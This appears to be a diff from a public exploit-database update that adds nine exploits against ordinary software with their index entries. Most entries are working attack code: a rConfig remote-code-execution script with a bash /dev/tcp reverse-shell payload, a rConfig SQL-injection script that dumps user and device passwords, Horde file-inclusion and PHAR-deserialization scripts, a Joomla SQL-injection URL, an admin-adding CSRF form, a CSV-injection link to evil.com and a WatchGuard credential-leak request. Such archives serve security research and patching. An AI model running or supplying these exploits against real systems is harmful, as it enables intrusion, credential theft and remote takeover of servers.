DB: 2020-03-13

9 changes to exploits/shellcodes

ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
rConfig 3.9 - 'searchColumn' SQL Injection
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading

exploits/java/webapps/48203.txt

@@ -0,0 +1,168 @@
+# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure 
+# Author: RedTeam Pentesting GmbH
+# Date: 2020-03-11
+# Vendor: https://www.watchguard.com
+# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+# CVE: N/A
+
+Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
+
+RedTeam Pentesting discovered a credential-disclosure vulnerability in
+the AD Helper component of the WatchGuard Fireware Threat Detection and
+Response (TDR) service, which allows unauthenticated attackers to gain
+Active Directory credentials for a Windows domain in plaintext.
+
+
+Details
+=======
+
+Product: WatchGuard Fireware AD Helper Component
+Affected Versions: 5.8.5.10233, < 5.8.5.10317
+Fixed Versions: 5.8.5.10317
+Vulnerability Type: Information Disclosure
+Security Risk: high
+Vendor URL: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-001
+Advisory Status: published
+CVE: GENERIC-MAP-NOMATCH
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
+
+
+Introduction
+============
+
+"Threat Detection and Response (TDR) is a cloud-based subscription
+service that integrates with your Firebox to minimize the consequences
+of data breaches and penetrations through early detection and automated
+remediation of security threats."
+
+"Threat Detection and Response includes the AD Helper component. If your
+network has an Active Directory server, you can install AD Helper to
+manage automated installation and updates of Host Sensors on your
+network."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+By accessing the AD Helper's web interface, it was discovered that a
+call to an API endpoint is made, which responds with plaintext
+credentials to all configured domain controllers. There is no
+authentication needed to use the described interface and the
+installation instructions at [1] contain no indication of any way to
+configure access control.
+
+
+Proof of Concept
+================
+
+An HTTP GET request to the path "/domains/list" of the AD Helper
+API returns, among others, the plaintext credentials to
+all configured Windows domain controllers:
+
+------------------------------------------------------------------------
+$ curl --silent "http://adhelper.example.com:8080/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc" | jq .
+
+{
+  "content": [
+    {
+      "id": 1,
+      "fullyQualifiedName": "example.com",
+      "logonDomain": "example.com",
+      "domainControllers": "dc1.example.com",
+      "username": "[DOMAIN_USER]",
+      "password": "[DOMAIN_PASSWORD]",
+      "uuid": "[...]",
+      "servers": [
+        {
+          [...]
+        }
+      ]
+    }
+  ],
+  "totalPages": 1,
+  "totalElements": 1,
+  "number": 0,
+  "numberOfElements": 1
+}
+------------------------------------------------------------------------
+
+The same request and its response can be observed when initially accessing
+the web interface. The discovered version of AD Helper responds with
+the following server banner:
+
+------------------------------------------------------------------------
+jetty(winstone-5.8.5.10233-9.4.12.v20180830)
+------------------------------------------------------------------------
+
+It is likely that other versions of the AD Helper Component are
+vulnerable as well.
+
+
+Workaround
+==========
+
+Ensure API of the AD Helper Component is not reachable over the network,
+for example by putting it behind a Firewall.
+
+
+Fix
+===
+
+Update to Version 5.8.5.10317 or later.
+
+
+Security Risk
+=============
+
+No authentication is needed to access AD Helper's web interface and the
+installation instructions at [1] describe that configured domain user
+accounts must possess at least the following privileges:
+
+ * Connect to the host
+ * Mount the share ADMIN$
+ * Create a file on the host
+ * Execute commands on the host
+ * Install software on the host
+
+Access to the "ADMIN$" share implies a user with administrative
+privileges. Therefore, this vulnerability poses a high risk.
+
+
+Timeline
+========
+
+2020-02-12 Vulnerability identified
+2020-02-19 Customer approved disclosure to vendor
+2020-02-24 Tried to contact the German branch of WatchGuard
+2020-02-27 Contacted the Dutch branch of WatchGuard
+2020-02-28 Contact to ADHelper QA Team Lead established
+2020-03-02 Advisory draft sent for verification
+2020-03-10 Vendor released fixed version and blog post
+2020-03-11 CVE ID requested
+2020-03-11 Advisory released
+
+
+References
+==========
+
+[1] https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/

exploits/php/webapps/48202.txt

@@ -0,0 +1,16 @@
+# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
+# Date: 2020-03-10
+# Author: Milad Karimi
+# Software Link:
+# Version:
+# Category : webapps
+# Tested on: windows 10 , firefox
+# CVE : CWE-89
+# Dork: inurl:index.php?option=com_newsfeeds
+
+
+index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
+
+Example:
+
+http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--

exploits/php/webapps/48204.txt

@@ -0,0 +1,38 @@
+# Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
+# Google Dork: N/A
+# Date: 2020-03-05
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://www.codepeople.net/
+# Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip
+# Version: 1.3.34
+# Tested on: Windows 7 x86 SP1
+# CVE : CVE-2020-9371, CVE-2020-9372
+
+----Stored Cross-Site-Scripting-------------------
+
+1) In http://127.0.0.1/wordpress/wp-admin/admin.php?page=cpabc_appointments.php
+2) Calendar Name=<script>alert(0)</script> and Update
+3) Click in any of the other tabs
+
+----CSV injection---------------------------------
+
+1) First we create a new calendar (Pages, add new, booking calendar) and Publish it (we can now log out) 
+2) Then we go to the page and introduce data, and the payload:
+
+New booking:
+
+Name: IMPORTANT DATA
+Description: http://evil.com/evil.php
+
+New booking:
+
+Name: test
+Description: =HYPERLINK(K2;H2) 
+
+This is the way it would work if i had a business registered and the payment was completed it can also be done by adding the new bookings with the same data from the admin panel
+
+3) Then we go to Bookings List and export the CSV file
+4) After that we open the file, and import data from an external file, using comma as separator
+5) Hyperlink to malicious PHP file is inserted and the user clicks on it, user is redirected to a fake login page (for example)
+
+Tested on Windows 7 Pro SP1 32-bit, Wordpress 5.3.2 and Excel 2016

exploits/php/webapps/48205.txt

@@ -0,0 +1,51 @@
+# Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-03-11
+# Exploit Author: Ismail Akıcı
+# Vendor Homepage: http://hrsale.com/
+# Software Link : http://demo.hrsale.com/
+# Software : HRSALE v1.1.8
+# Product Version: v1.1.8
+# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
+# Vulnerability : Cross-Site Request Forgery
+
+# Description :
+# CSRF vulnerability was discovered in v1.1.8 version of HRSALE.
+# With this vulnerability, authorized users can be added to the system.
+
+HTML CSRF PoC :
+
+<html>
+  <!-- CSRF PoC - generated by Burp Suite Professional -->
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://demo.hrsale.com/admin/employees/add_employee" method="POST" enctype="multipart/form-data">
+      <input type="hidden" name="&#95;user" value="1" />
+      <input type="hidden" name="csrf&#95;hrsale" value="e8ed76f1f2110f7244b58062e2209961" />
+      <input type="hidden" name="first&#95;name" value="Ismail" />
+      <input type="hidden" name="last&#95;name" value="Akici" />
+      <input type="hidden" name="company&#95;id" value="1" />
+      <input type="hidden" name="location&#95;id" value="1" />
+      <input type="hidden" name="username" value="ismailtakici" />
+      <input type="hidden" name="email" value="ismail&#46;akici&#64;gmail&#46;com" />
+      <input type="hidden" name="date&#95;of&#95;birth" value="2020&#45;03&#45;11" />
+      <input type="hidden" name="contact&#95;no" value="5554443322" />
+      <input type="hidden" name="employee&#95;id" value="1" />
+      <input type="hidden" name="date&#95;of&#95;joining" value="2020&#45;03&#45;11" />
+      <input type="hidden" name="department&#95;id" value="1" />
+      <input type="hidden" name="subdepartment&#95;id" value="YES" />
+      <input type="hidden" name="designation&#95;id" value="9" />
+      <input type="hidden" name="gender" value="Male" />
+      <input type="hidden" name="office&#95;shift&#95;id" value="1" />
+      <input type="hidden" name="password" value="Test1234&#33;" />
+      <input type="hidden" name="confirm&#95;password" value="Test1234&#33;" />
+      <input type="hidden" name="role" value="1" />
+      <input type="hidden" name="leave&#95;categories&#91;&#93;" value="0" />
+      <input type="hidden" name="leave&#95;categories&#91;&#93;" value="1" />
+      <input type="hidden" name="address" value="Test&#32;Address" />
+      <input type="hidden" name="is&#95;ajax" value="1" />
+      <input type="hidden" name="add&#95;type" value="employee" />
+      <input type="hidden" name="form" value="add&#95;employee" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/48207.py

@@ -0,0 +1,50 @@
+# Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
+# Date: 2020-03-08
+# Exploit Author: Engin Demirbilek
+# Vendor Homepage: https://www.rconfig.com/
+# Version: rConfig <= 3.94
+# Tested on: centOS
+# CVE: CVE-2020-10221
+# Advisory link: https://engindemirbilek.github.io/rconfig-3.93-rce
+
+import requests
+import sys
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+if len(sys.argv) < 6:
+	print "Usage: ./exploit.py http(s)://url username password listenerIP listenerPort"
+	exit()
+
+url = sys.argv[1]
+user = sys.argv[2]
+password = sys.argv[3]
+payload = ";bash -i >& /dev/tcp/{}/{} 0>&1;".format(sys.argv[4], sys.argv[5])
+
+login = {
+	'user':user,
+	'pass':password,
+	'sublogin':'1'
+}
+req = requests.Session()
+print "Sendin login request ..."
+login = req.post(url+"/lib/crud/userprocess.php", data=login, verify=False)
+
+payload = {
+	'fileName':payload,
+}
+
+
+
+print "[+] Sendin exploit ..."
+
+exploit = req.post(url+"/lib/ajaxHandlers/ajaxAddTemplate.php",cookies=req.cookies, data=payload, headers={
+'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
+'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+'Accept-Encoding':'gzip, deflate',
+'Content-Type':'application/x-www-form-urlencoded'},verify=False)
+
+if exploit.status_code == 200:
+	print "[+] Everything seems ok, check your listener."
+else:
+	print "[-] Exploit failed,  system is patched or credentials are wrong."

exploits/php/webapps/48208.py

@@ -0,0 +1,107 @@
+# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection
+# Exploit Author: vikingfr
+# Date: 2020-03-03
+# CVE-2020-10220
+# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py
+# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)
+# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip
+# Install scripts  : 
+# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
+# https://www.rconfig.com/downloads/scripts/centos7_install.sh
+# https://www.rconfig.com/downloads/scripts/centos6_install.sh
+# Version: tested v3.9.4
+# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24
+#
+# Notes : If you want to reproduce in your lab environment follow those links :
+# http://help.rconfig.com/gettingstarted/installation
+# then
+# http://help.rconfig.com/gettingstarted/postinstall
+#
+# $ python3 rconfig_sqli.py https://1.1.1.1
+# rconfig 3.9 - SQL Injection PoC
+# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php
+# [+] Extracting the current DB name :
+# rconfig2
+# [+] Extracting 10 first users :
+# admin:1:63a9f0ea7bb98050796b649e85481845
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# [+] Extracting 10 first devices :
+# 127-0-0-1:127.0.0.1::ocdvulnpass:
+# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret
+# Maybe no more information ?
+# Maybe no more information ?
+# [snip]
+# Done
+ 
+
+#!/usr/bin/python3
+import requests
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+print ("rconfig 3.9 - SQL Injection PoC")
+if len(sys.argv) != 2:
+    print ("[+] Usage : ./rconfig_exploit.py https://target")
+    exit()
+
+vuln_page="/commands.inc.php"
+vuln_parameters="?searchOption=contains&searchField=vuln&search=search&searchColumn=command"
+given_target = sys.argv[1]
+target =  given_target
+target += vuln_page
+target += vuln_parameters
+
+request = requests.session()
+dashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)
+
+
+def extractDBinfos(myTarget=None,myPayload=None):
+	"""
+	Extract information from database
+	Args:
+		- target+payload (String)
+	Returns:
+		- payload result (String)
+	"""
+	result = ""
+	encoded_request = myTarget+myPayload
+	exploit_req = request.get(encoded_request)
+	if '[PWN]' in str(exploit_req.content):
+		result = str(exploit_req.content).split('[PWN]')[1]
+	else:
+		result="Maybe no more information ?"
+	
+	return result
+
+
+if dashboard_request.status_code != 404:
+	print ("[+] Triggering the payloads on "+given_target+vuln_page)
+	# get the db name
+	print ("[+] Extracting the current DB name :")
+	db_payload = "%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"
+	db_name = extractDBinfos(target,db_payload)
+	print (db_name)
+    # DB extract users
+	print ("[+] Extracting 10 first users :")
+	for i in range (0, 10):
+            user1_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".users+limit+"+str(i)+","+str(i+1)+"),NULL--"
+            user_h = extractDBinfos(target,user1_payload)
+            #print ("[+] Dump device "+str(i))
+            print (user_h)
+    # DB extract devices information
+	print ("[+] Extracting 10 first devices :")
+	for i in range (0, 10):
+            device_payload="%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20"+db_name+".nodes+limit+"+str(i)+","+str(i+1)+"),NULL--"
+            device_h = extractDBinfos(target,device_payload)
+            #print ("[+] Dump device "+str(i))
+            print (device_h)
+    
+	print ("Done")
+	               
+else:
+    print ("[-] Please verify the URI")
+    exit()

exploits/php/webapps/48209.py

@@ -0,0 +1,166 @@
+## exploit-inc-inclusion.py
+#!/usr/bin/env python3
+from horde import Horde
+import subprocess
+import sys
+
+TEMP_DIR = '/tmp'
+
+if len(sys.argv) < 5:
+    print('Usage: <base_url> <username> <password> <filename> <php_code>')
+    sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+filename = sys.argv[4]
+php_code = sys.argv[5]
+
+# log into the web application
+horde = Horde(base_url, username, password)
+
+# upload (delete manually) and evaluate the .inc file
+horde.upload_to_tmp('{}.inc'.format(filename), '<?php {} die();'.format(php_code))
+horde.include_remote_inc_file('{}/{}'.format(TEMP_DIR, filename))
+## exploit-inc-inclusion.py EOF
+
+
+
+## horde.py
+import re
+import requests
+
+class Horde():
+    def __init__(self, base_url, username, password):
+        self.base_url = base_url
+        self.username = username
+        self.password = password
+        self.session = requests.session()
+        self.token = None
+        self._login()
+
+    def _login(self):
+        url = '{}/login.php'.format(self.base_url)
+        data = {
+            'login_post': 1,
+            'horde_user': self.username,
+            'horde_pass': self.password
+        }
+        response = self.session.post(url, data=data)
+        token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
+        assert (
+            len(response.history) == 1 and
+            response.history[0].status_code == 302 and
+            response.history[0].headers['location'] == '/services/portal/' and
+            token_match
+        ), 'Cannot log in'
+        self.token = token_match.group(1)
+
+    def upload_to_tmp(self, filename, data):
+        url = '{}/turba/add.php'.format(self.base_url)
+        files = {
+            'object[photo][img][file]': (None, filename),
+            'object[photo][new]': ('x', data)
+        }
+        response = self.session.post(url, files=files)
+        assert response.status_code == 200, 'Cannot upload the file to tmp'
+
+    def include_remote_inc_file(self, path):
+        # vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
+        app = 'trean:trean_Block_Bookmarks'
+
+        # add one dummy bookmark (to be sure)
+        url = '{}/trean/add.php'.format(self.base_url)
+        data = {
+            'actionID': 'add_bookmark',
+            'url': 'x'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark'
+
+        # add bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark block'
+
+        # edit bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[template]': '../../../../../../../../../../../' + path
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the bookmark block'
+
+        # evaluate the remote file
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+        print(response.text)
+
+        # remove the bookmark block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the bookmark block'
+
+    def trigger_phar(self, path):
+        # vulnerable block (alternatively the same can be obtained by creating a
+        # bookmark with the PHAR path and clocking on it)
+        app = 'horde:horde_Block_Feed'
+
+        # add syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the syndicated feed block'
+
+        # edit syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[uri]': 'phar://{}'.format(path)
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the syndicated feed block'
+
+        # load the PHAR archive
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+
+        # remove the syndicated feed block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the syndicated feed block'
+## horde.py EOF

exploits/php/webapps/48210.py

@@ -0,0 +1,241 @@
+## exploit-phar-loading.py
+#!/usr/bin/env python3
+from horde import Horde
+import requests
+import subprocess
+import sys
+
+TEMP_DIR = '/tmp'
+WWW_ROOT = '/var/www/html'
+
+if len(sys.argv) < 5:
+    print('Usage: <base_url> <username> <password> <filename> <php_code>')
+    sys.exit(1)
+
+base_url = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3]
+filename = sys.argv[4]
+php_code = sys.argv[5]
+
+source = '{}/{}.phar'.format(TEMP_DIR, filename)
+destination = '{}/static/{}.php'.format(WWW_ROOT, filename) # destination (delete manually)
+temp = 'temp.phar'
+url = '{}/static/{}.php'.format(base_url, filename)
+
+# log into the web application
+horde = Horde(base_url, username, password)
+
+# create a PHAR that performs a rename when loaded and runs the payload when executed
+subprocess.run([
+    'php', 'create-renaming-phar.php',
+    temp, source, destination, php_code
+], stderr=subprocess.DEVNULL)
+
+# upload the PHAR
+with open(temp, 'rb') as fs:
+    phar_data = fs.read()
+    horde.upload_to_tmp('{}.phar'.format(filename), phar_data)
+
+# load the phar thus triggering the rename
+horde.trigger_phar(source)
+
+# issue a request to trigger the payload
+response = requests.get(url)
+print(response.text)
+## exploit-phar-loading.py EOF
+
+
+
+
+## create-renaming-phar.php
+#!/usr/bin/env php
+<?php
+
+// the __destruct method of Horde_Auth_Passwd eventually calls
+// rename($this->_lockfile, $this->_params['filename']) if $this->_locked
+class Horde_Auth_Passwd {
+    // visibility must match since protected members are prefixed by "\x00*\x00"
+    protected $_locked;
+    protected $_params;
+
+    function __construct($source, $destination) {
+        $this->_params = array('filename' => $destination);
+        $this->_locked = true;
+        $this->_lockfile = $source;
+    }
+};
+
+function createPhar($path, $source, $destination, $stub) {
+    // create the object and specify source and destination files
+    $object = new Horde_Auth_Passwd($source, $destination);
+
+    // create the PHAR
+    $phar = new Phar($path);
+    $phar->startBuffering();
+    $phar->addFromString('x', '');
+    $phar->setStub("<?php $stub __HALT_COMPILER();");
+    $phar->setMetadata($object);
+    $phar->stopBuffering();
+}
+
+function main() {
+    global $argc, $argv;
+
+    // check arguments
+    if ($argc != 5) {
+        fwrite(STDERR, "Usage: <path> <source> <destination> <stub>\n");
+        exit(1);
+    }
+
+    // create a fresh new phar
+    $path = $argv[1];
+    $source = $argv[2];
+    $destination = $argv[3];
+    $stub = $argv[4];
+    @unlink($path);
+    createPhar($path, $source, $destination, $stub);
+}
+
+main();
+## create-renaming-phar.php EOF
+
+
+## horde.py
+import re
+import requests
+
+class Horde():
+    def __init__(self, base_url, username, password):
+        self.base_url = base_url
+        self.username = username
+        self.password = password
+        self.session = requests.session()
+        self.token = None
+        self._login()
+
+    def _login(self):
+        url = '{}/login.php'.format(self.base_url)
+        data = {
+            'login_post': 1,
+            'horde_user': self.username,
+            'horde_pass': self.password
+        }
+        response = self.session.post(url, data=data)
+        token_match = re.search(r'"TOKEN":"([^"]+)"', response.text)
+        assert (
+            len(response.history) == 1 and
+            response.history[0].status_code == 302 and
+            response.history[0].headers['location'] == '/services/portal/' and
+            token_match
+        ), 'Cannot log in'
+        self.token = token_match.group(1)
+
+    def upload_to_tmp(self, filename, data):
+        url = '{}/turba/add.php'.format(self.base_url)
+        files = {
+            'object[photo][img][file]': (None, filename),
+            'object[photo][new]': ('x', data)
+        }
+        response = self.session.post(url, files=files)
+        assert response.status_code == 200, 'Cannot upload the file to tmp'
+
+    def include_remote_inc_file(self, path):
+        # vulnerable block (alternatively 'trean:trean_Block_Mostclicked')
+        app = 'trean:trean_Block_Bookmarks'
+
+        # add one dummy bookmark (to be sure)
+        url = '{}/trean/add.php'.format(self.base_url)
+        data = {
+            'actionID': 'add_bookmark',
+            'url': 'x'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark'
+
+        # add bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the bookmark block'
+
+        # edit bookmark block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[template]': '../../../../../../../../../../../' + path
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the bookmark block'
+
+        # evaluate the remote file
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+        print(response.text)
+
+        # remove the bookmark block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the bookmark block'
+
+    def trigger_phar(self, path):
+        # vulnerable block (alternatively the same can be obtained by creating a
+        # bookmark with the PHAR path and clocking on it)
+        app = 'horde:horde_Block_Feed'
+
+        # add syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save-resume',
+            'app': app,
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot add the syndicated feed block'
+
+        # edit syndicated feed block
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            'token': self.token,
+            'row': 0,
+            'col': 0,
+            'action': 'save',
+            'app': app,
+            'params[uri]': 'phar://{}'.format(path)
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot edit the syndicated feed block'
+
+        # load the PHAR archive
+        url = '{}/services/portal/'.format(self.base_url)
+        response = self.session.get(url)
+
+        # remove the syndicated feed block so to not break the page
+        url = '{}/services/portal/edit.php'.format(self.base_url)
+        data = {
+            # XXX token not needed here
+            'row': 0,
+            'col': 0,
+            'action': 'removeBlock'
+        }
+        response = self.session.post(url, data=data)
+        assert response.status_code == 200, 'Cannot reset the syndicated feed block'
+## horde.py EOF

exploits/windows/local/48206.txt

@@ -0,0 +1,34 @@
+# Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
+# Discovery by: Roberto Piña
+# Discovery Date: 2020-03-11
+# Vendor Homepage: https://www.asus.com/
+# Software Link :https://dlcdnets.asus.com/pub/ASUS/misc/utils/AISuite3_Win10_H97M-Pro_V10102.zip?_ga=2.170180192.1334401606.1583873755-790266082.1583873755
+# Tested Version: 1.00.22
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 Home x64 en
+
+# Step to discover Unquoted Service Path: 
+
+C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "asHmComSvc" | findstr /i /v """
+ASUS HM Com Service                                                                 asHmComSvc                                C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe                                                                                    Auto
+
+C:\>sc qc asHmComSvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: asHmComSvc
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\ASUS\AAHM\1.00.22\aaHMSvc.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : ASUS HM Com Service
+        DEPENDENCIES       : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+#Exploit:
+# A successful attempt would require the local user to be able to insert their code in the system root path 
+# undetected by the OS or other security applications where it could potentially be executed during 
+# application startup or reboot. If successful, the local user's code would execute with the elevated 
+# privileges of the application.

files_exploits.csv

@@ -10988,6 +10988,7 @@ id,file,description,date,author,type,platform,port
 48185,exploits/linux/local/48185.rb,"OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit)",2020-03-09,Metasploit,local,linux,
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,
 48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,
+48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42457,3 +42458,11 @@ id,file,description,date,author,type,platform,port
 48189,exploits/php/webapps/48189.txt,"YzmCMS 5.5 - 'url' Persistent Cross-Site Scripting",2020-03-10,En_dust,webapps,php,
 48190,exploits/php/webapps/48190.txt,"Persian VIP Download Script 1.0 - 'active' SQL Injection",2020-03-10,S3FFR,webapps,php,
 48197,exploits/php/webapps/48197.txt,"Wordpress Plugin Search Meter 2.13.2 - CSV injection",2020-03-11,"Daniel Monzón",webapps,php,
+48202,exploits/php/webapps/48202.txt,"Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection",2020-03-12,"Milad karimi",webapps,php,
+48203,exploits/java/webapps/48203.txt,"WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure",2020-03-12,"RedTeam Pentesting GmbH",webapps,java,
+48204,exploits/php/webapps/48204.txt,"Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,
+48205,exploits/php/webapps/48205.txt,"HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)",2020-03-12,"Ismail Akıcı",webapps,php,
+48207,exploits/php/webapps/48207.py,"rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution",2020-03-12,"Engin Demirbilek",webapps,php,
